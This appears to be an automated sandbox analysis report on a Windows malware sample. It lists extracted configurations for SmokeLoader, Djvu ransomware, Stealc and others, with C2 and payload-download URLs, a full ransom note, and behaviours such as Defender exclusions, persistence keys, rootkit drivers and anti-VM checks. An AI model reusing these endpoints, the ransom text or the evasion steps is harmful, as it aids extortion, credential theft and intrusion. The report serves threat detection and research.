Analysis
-
max time kernel
75s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
22-01-2024 12:44
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20231222-en
General
-
Target
file.exe
-
Size
6.4MB
-
MD5
4bf40a595b37b88d2f0967eb52a30d7d
-
SHA1
4ae12b7d109b46943121a6ee5feeff34b454e5f6
-
SHA256
1cf4a4b0f9432f78cd76b30cf8e6070d2d49b70d42ec4e2192da86d09a0a02fa
-
SHA512
01f49988f45eabe58fb2b33cd5e367d83373a87a7afe1bbc032e60d2cc5938b23b43fd39203179bdccd10f54217d20dad1339a372108a07cdf2b4611044ea2ba
-
SSDEEP
98304:v627llWkfUUxdWhVwDGd6wJgl12SS3aayEb22ZA6EbK54UQYvhvWgVPWGAMh1uxT:v68XZ1dMgGYwJSax6u5JdBS7UkxT
Malware Config
Extracted
smokeloader
pub1
Extracted
smokeloader
2022
http://trad-einmyus.com/index.php
http://tradein-myus.com/index.php
http://trade-inmyus.com/index.php
Extracted
fabookie
http://app.alie3ksgaa.com/check/safe
Extracted
djvu
http://habrafa.com/test1/get.php
-
extension
.cdpo
-
offline_id
Bn3q97hwLouKbhkQRNO4SeV07gjdEQVm8NKhg0t1
-
payload_url
http://brusuax.com/dl/build2.exe
http://habrafa.com/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-FCWSCsjEWS Price of private key and decrypt software is $1999. Discount 50% available if you contact us first 72 hours, that's price for you is $999. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0844OSkw
Extracted
stealc
http://185.172.128.79
-
url_path
/3886d2276�6914c4.php
Extracted
loaderbot
https://ca94025.tw1.ru/cmd.php
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detect Fabookie payload 2 IoCs
resource yara_rule behavioral1/memory/2744-314-0x0000000003AF0000-0x0000000003C20000-memory.dmp family_fabookie behavioral1/memory/2744-389-0x0000000003AF0000-0x0000000003C20000-memory.dmp family_fabookie -
Detect Vidar Stealer 5 IoCs
resource yara_rule behavioral1/memory/2140-485-0x0000000000450000-0x000000000047B000-memory.dmp family_vidar_v6 behavioral1/memory/1940-487-0x0000000000400000-0x000000000063F000-memory.dmp family_vidar_v6 behavioral1/memory/1940-486-0x0000000000400000-0x000000000063F000-memory.dmp family_vidar_v6 behavioral1/memory/1940-480-0x0000000000400000-0x000000000063F000-memory.dmp family_vidar_v6 behavioral1/memory/1940-660-0x0000000000400000-0x000000000063F000-memory.dmp family_vidar_v6 -
Detect ZGRat V1 1 IoCs
resource yara_rule behavioral1/memory/2024-848-0x0000000004C10000-0x0000000004CDA000-memory.dmp family_zgrat_v1 -
Detected Djvu ransomware 14 IoCs
resource yara_rule behavioral1/memory/3056-387-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/3056-388-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/3056-383-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2716-386-0x0000000002220000-0x000000000233B000-memory.dmp family_djvu behavioral1/memory/2056-442-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2056-441-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/3056-430-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2056-456-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2056-455-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2056-463-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2056-462-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2056-460-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2056-464-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2056-583-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Glupteba payload 10 IoCs
resource yara_rule behavioral1/memory/2624-52-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2624-50-0x0000000002B20000-0x000000000340B000-memory.dmp family_glupteba behavioral1/memory/2624-62-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2624-75-0x0000000002B20000-0x000000000340B000-memory.dmp family_glupteba behavioral1/memory/2700-85-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2700-77-0x0000000002A80000-0x000000000336B000-memory.dmp family_glupteba behavioral1/memory/2700-159-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/1060-161-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/1060-338-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/1060-655-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 1448 created 1336 1448 Looksmart.pif 9 PID 1448 created 1336 1448 Looksmart.pif 9 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe -
LoaderBot executable 2 IoCs
resource yara_rule behavioral1/memory/328-875-0x00000000001C0000-0x0000000000928000-memory.dmp loaderbot behavioral1/memory/328-877-0x00000000001C0000-0x0000000000928000-memory.dmp loaderbot -
Modifies boot configuration data using bcdedit 1 TTPs 14 IoCs
pid Process 2424 bcdedit.exe 2148 bcdedit.exe 2644 bcdedit.exe 1844 bcdedit.exe 1612 bcdedit.exe 2892 bcdedit.exe 2244 bcdedit.exe 904 bcdedit.exe 320 bcdedit.exe 3012 bcdedit.exe 2284 bcdedit.exe 2852 bcdedit.exe 2060 bcdedit.exe 1088 bcdedit.exe -
XMRig Miner payload 1 IoCs
resource yara_rule behavioral1/memory/2264-1165-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\drivers\Winmon.sys csrss.exe -
Modifies Installed Components in the registry 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 592 netsh.exe -
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartTrace.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartTrace.url cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url 1C6F.exe -
Executes dropped EXE 30 IoCs
pid Process 2408 InstallSetup7.exe 2280 conhost.exe 2624 31839b57a4f11171d6abc8bbc4451ee4.exe 2744 rty25.exe 2572 BroomSetup.exe 2700 31839b57a4f11171d6abc8bbc4451ee4.exe 1060 csrss.exe 2564 patch.exe 2544 injector.exe 3060 6816.exe 2432 conhost.exe 2716 conhost.exe 3056 Driver.exe 2532 7E55.exe 2056 7E55.exe 2140 conhost.exe 1940 build2.exe 852 windefender.exe 2860 windefender.exe 2896 A305.exe 2472 build3.exe 1132 build3.exe 1888 nsy1613.tmp 2724 findstr.exe 2576 mstsca.exe 716 conhost.exe 2024 Driver.exe 1448 Looksmart.pif 328 1C6F.exe 2264 conhost.exe -
Loads dropped DLL 41 IoCs
pid Process 2240 cmd.exe 2240 conhost.exe 2240 conhost.exe 2240 conhost.exe 2240 conhost.exe 2240 conhost.exe 2408 InstallSetup7.exe 2408 InstallSetup7.exe 2408 InstallSetup7.exe 2700 31839b57a4f11171d6abc8bbc4451ee4.exe 2700 31839b57a4f11171d6abc8bbc4451ee4.exe 868 Process not Found 2564 patch.exe 2564 patch.exe 2564 patch.exe 2564 patch.exe 2564 patch.exe 1060 csrss.exe 2564 patch.exe 2564 patch.exe 2564 patch.exe 1060 csrss.exe 2716 conhost.exe 3056 Driver.exe 3056 Driver.exe 2532 7E55.exe 2056 7E55.exe 2056 7E55.exe 2056 7E55.exe 2056 7E55.exe 1892 WerFault.exe 1892 WerFault.exe 1892 WerFault.exe 1892 WerFault.exe 2408 InstallSetup7.exe 2408 InstallSetup7.exe 2408 InstallSetup7.exe 1888 nsy1613.tmp 1888 nsy1613.tmp 2240 conhost.exe 328 1C6F.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 536 icacls.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x000a000000019484-569.dat upx behavioral1/memory/852-570-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral1/memory/2860-572-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral1/memory/852-571-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral1/memory/2860-698-0x0000000000400000-0x00000000008DF000-memory.dmp upx -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\eaa9f8dc-4dd2-4ab5-a4dc-204eee0883af\\7E55.exe\" --AutoStart" Driver.exe Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\1C6F.exe" 1C6F.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Manipulates WinMon driver. 1 IoCs
Roottkits write to WinMon to hide PIDs from being detected.
description ioc Process File opened for modification \??\WinMon csrss.exe -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 328 1C6F.exe 328 1C6F.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 2716 set thread context of 3056 2716 conhost.exe 178 PID 2532 set thread context of 2056 2532 7E55.exe 89 PID 2140 set thread context of 1940 2140 conhost.exe 93 PID 2472 set thread context of 1132 2472 build3.exe 107 PID 2724 set thread context of 2576 2724 findstr.exe 116 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 31839b57a4f11171d6abc8bbc4451ee4.exe -
Drops file in Windows directory 5 IoCs
description ioc Process File created C:\Windows\Logs\CBS\CbsPersist_20240122124412.cab makecab.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\rss 31839b57a4f11171d6abc8bbc4451ee4.exe File created C:\Windows\rss\csrss.exe 31839b57a4f11171d6abc8bbc4451ee4.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 308 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1892 1940 WerFault.exe 93 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6816.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6816.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6816.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI conhost.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI conhost.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI conhost.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 nsy1613.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString nsy1613.tmp -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 560 schtasks.exe 1236 schtasks.exe 1784 schtasks.exe 2696 schtasks.exe 3004 schtasks.exe 2620 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2664 timeout.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 2432 tasklist.exe 2088 tasklist.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-662 = "Cen. Australia Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-341 = "Egypt Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-52 = "Greenland Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-621 = "Korea Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-11 = "Azores Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-572 = "China Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-571 = "China Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-51 = "Greenland Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-182 = "Mountain Standard Time (Mexico)" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-402 = "Arabic Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-261 = "GMT Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-472 = "Ekaterinburg Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-532 = "Sri Lanka Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-511 = "Central Asia Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-22 = "Cape Verde Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-262 = "GMT Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-831 = "SA Eastern Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-462 = "Afghanistan Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-232 = "Hawaiian Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-71 = "Newfoundland Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-601 = "Taipei Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-231 = "Hawaiian Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-912 = "Mauritius Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-432 = "Iran Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-592 = "Malay Peninsula Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" 